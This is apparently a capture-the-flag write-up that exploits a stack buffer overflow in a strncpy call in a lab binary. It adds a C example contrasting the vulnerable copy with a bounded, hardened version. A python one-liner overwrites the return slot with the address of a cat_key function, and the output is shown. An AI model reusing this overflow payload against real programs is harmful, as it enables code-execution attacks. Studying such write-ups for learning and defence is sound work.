This binary is vulnerable to a buffer overflow in the strncpy call made in the main function with user-supplied input. It takes two arguments: argument 1 is the offset on the stack of the value to copy data from, and argument 2 is the number of bytes to copy. The destination buffer holds at most 280 bytes. Since the binary has a function containing a call to system("cat key.txt"), we may simply replace the saved frame pointer with that function's address.
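The bug class described above, as an added example that is not the challenge binary's code: a constructed copy routine that takes the byte count from the user and never checks it against the destination, next to a hardened version that bounds the copy by the destination size and rejects a request that would not fit. BUF_SIZE, vulnerable_copy and safe_copy are assumed names chosen for this illustration.

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define BUF_SIZE 280  /* assumed: size of the stack buffer in the write-up */

/* Constructed illustration of the bug: the copy length comes from the user
 * and is never compared with the destination size, so a count larger than
 * BUF_SIZE writes past the buffer into whatever sits above it on the stack.
 * Shown for contrast only; the test below never calls it. */
void vulnerable_copy(const char *src, size_t user_len) {
    char buf[BUF_SIZE];
    strncpy(buf, src, user_len);   /* bound is the user's number, not the buffer's */
    buf[BUF_SIZE - 1] = '\0';      /* too late: bytes past the end were already written */
    printf("You entered : %s\n", buf);
}

/* Hardened version: the caller passes the real destination size, the copy is
 * clamped to it, the result is always NUL-terminated, and an oversized request
 * is refused instead of silently accepted. Returns 0 on success, -1 on reject. */
int safe_copy(char *dst, size_t dst_size, const char *src, size_t user_len) {
    if (dst == NULL || src == NULL || dst_size == 0) return -1;
    if (user_len >= dst_size) return -1;   /* would overflow or leave no room for NUL */
    size_t n = strnlen(src, user_len);     /* never read past the source's terminator */
    memcpy(dst, src, n);
    dst[n] = '\0';
    return 0;
}

/* Same argument layout as the write-up's binary: argv[1] = index of the
 * argument to copy from, argv[2] = byte count, remaining argv = data. */
int main(int argc, char **argv) {
    if (argc < 4) { fprintf(stderr, "usage: %s <argv-index> <count> <data>\n", argv[0]); return 1; }
    size_t idx = strtoul(argv[1], NULL, 10);
    size_t len = strtoul(argv[2], NULL, 10);
    if (idx < 3 || idx >= (size_t)argc) { fprintf(stderr, "bad index\n"); return 1; }
    char buf[BUF_SIZE];
    if (safe_copy(buf, sizeof buf, argv[idx], len) != 0) {
        fprintf(stderr, "refused: %zu bytes do not fit in %zu\n", len, sizeof buf);
        return 1;
    }
    printf("You entered : %s\n", buf);
    return 0;
}
```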
The address of cat_key is 0x0000000000400654. We may craft the exploit now, knowing the offset of the saved frame pointer (%RSP+280) and the address of cat_key. We simply need to copy more than 288 bytes (we choose 300 arbitrarily) from the 3rd argument offset in the stack, i.e. the third argument we pass.
~/cscamp/exp200$ ./level200 3 300 `python -c 'print "A"*280 + "\x54\x06\x40\x00\x00\x00\x00\x00"'`
You entred : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
cat: ./key.txt: No such file or directory
Segmentation fault
~/cscamp/exp200$